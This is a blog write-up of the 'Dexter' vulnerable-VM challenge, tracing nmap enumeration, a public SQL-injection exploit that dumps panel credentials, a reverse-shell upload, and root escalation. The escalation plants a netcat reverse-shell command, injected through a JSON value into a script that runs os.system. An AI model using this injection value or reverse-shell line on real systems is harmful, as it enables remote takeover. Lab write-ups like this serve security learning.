Tuesday 9 February 2016

Dexter challenge

 Hi
root@osboxes:~# nmap -sn 192.168.1.0/24

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-04 22:54 GMT

Nmap scan report for 192.168.1.105
Host is up (0.00072s latency).
MAC Address: 00:0C:29:48:F0:B7 (VMware)
Enumeration services
root@osboxes:~# nmap -sV -A 192.168.1.105

Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-04 22:54 GMT
Nmap scan report for 192.168.1.105
Host is up (0.0013s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4 (protocol 2.0)
| ssh-hostkey:
|   1024 2b:60:6f:53:b8:c9:c8:f4:3b:0e:9b:9e:46:97:b7:55 (DSA)
|   2048 b5:9f:66:ab:f8:5d:a9:3e:51:8a:97:c3:85:10:e3:62 (RSA)
|_  256 e7:bc:52:4f:29:0d:db:21:7e:72:76:2b:dd:ec:12:8e (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          46351/udp  status
|_  100024  1          48991/tcp  status
Let's browse the application









The Panel link rediect us to web form.










SQL Injection does not work in this case :-/ Let's run DirBuster
















My each ideas does not work, our sheet-anchor is some exploit in the internet
Dexter (CasinoLoader) Panel - SQL Injection
Hmmm this exploit looks interesting, is not it? :-) I have read the exploit and execute it:
root@osboxes:~/dexter# python 31686.py dump 192.168.1.105/Panel/gateway.php
User details: [{'password': 'if i had any real talent, i would make money legitimately', 'user': 'loserbotter'}]
Bot details: []
Let;s try log in to the Panel using the credentials :-) Excellent it works!
File Uploader may allow upload our reverse shell exploit.








OK, let's execute our uploaded exploit.











Excellent! We have got limited shell!
So, we are looking for an exploit, because we have pleasure with
www-data@dexter:/var/www$ uname -a
Linux dexter 3.2.0-4-686-pae #1 SMP Debian 3.2.54-2 i686 GNU/Linux
I have not found any effective exploit for our case. I was finding some interesting files and in /var/www we have
www-data@dexter:/var/www$ ls
Panel  antitamper.list    antitamper.py  index.html  tamper.log
antitamper.py and antitamper.list look interesting, isn't it? Let's check privileges these files
-rw-rw-rw-  1 root root  840 Mar 16  2014 antitamper.list
-rw-r--r--  1 root root  278 Mar 16  2014 antitamper.py
Hmmm, we can display content of these files
www-data@dexter:/var/www$ cat antitamper.list
{
    "/var/www/Panel/info.php": "d8fa4356213b6ce9253f55acdff780ac",
    "/var/www/Panel/upload.php" : "b2640cea86e5171662a082b6a043fcc2",
    "/var/www/Panel/style.css": "92f234834a61b7fde898eea40f857bb3",
    "/var/www/Panel/gateway.php": "7b93115195db0c0b085a1107c4cc1aed",
    "/var/www/Panel/pagination.php": "1a8d91c12263dd5298a70c72976c5e97",
    "/var/www/Panel/viewer.php": "292b3b12c2f90c0e557bf599c2475c15",
    "/var/www/Panel/config.php": "421fc13061ab1f343e6607e4ef4f8f42",
    "/var/www/Panel/main.php": "7812b7c1ed608299c9bece4f46607423",
    "/var/www/Panel/load.php": "0f95762562aa97c62d004949e7337e95",
    "/var/www/Panel/viewer_pagination.php": "60c7444a92daa115abfecc73c46fc2ec",
    "/var/www/Panel/master.php": "2b50c51fce89ddcfb769effdeab7080c",
    "/var/www/Panel/index.php": "af44aa507c02f3c1aede5e251b28dc64"
}
Probably it is <file>:<md5(file)>
www-data@dexter:/var/www$ cat antitamper.py

import os
import json

def check():
    with open('/var/www/antitamper.list') as f:
        content = json.loads(f.read())
        for f in content:
            s = "echo '%s  %s' | md5sum -c --status >> /var/www/tamper.log" % (content[f], f)
            os.system(s)
check()
This script verify file integrity. For us this information isn't nice. But we can see that os.system(s) has vulnerability. My idea is: I will copy content of antitamper.list, create new file in my machine and fill in via following content
{
    "root":"'; nc -nv -e /bin/sh 192.168.1.103 4444 #"
    "/var/www/Panel/info.php": "d8fa4356213b6ce9253f55acdff780ac",
    "/var/www/Panel/upload.php" : "b2640cea86e5171662a082b6a043fcc2",
    "/var/www/Panel/style.css": "92f234834a61b7fde898eea40f857bb3",
    "/var/www/Panel/gateway.php": "7b93115195db0c0b085a1107c4cc1aed",
    "/var/www/Panel/pagination.php": "1a8d91c12263dd5298a70c72976c5e97",
    "/var/www/Panel/viewer.php": "292b3b12c2f90c0e557bf599c2475c15",
    "/var/www/Panel/config.php": "421fc13061ab1f343e6607e4ef4f8f42",
    "/var/www/Panel/main.php": "7812b7c1ed608299c9bece4f46607423",
    "/var/www/Panel/load.php": "0f95762562aa97c62d004949e7337e95",
    "/var/www/Panel/viewer_pagination.php": "60c7444a92daa115abfecc73c46fc2ec",
    "/var/www/Panel/master.php": "2b50c51fce89ddcfb769effdeab7080c",
    "/var/www/Panel/index.php": "af44aa507c02f3c1aede5e251b28dc64"
}
I think that, the content is obvious for you. So, we have to upload the file to our victim (in the same way like our reverse shell before).
 and now
www-data@dexter:/var/www$ cat /var/www/Panel/exes/antitamper.list > antitamper.list
I have checked and we have updated antitamper.list file. All what we have to do is to execute antitamper.py script.
We are waiting and...







Game over!
at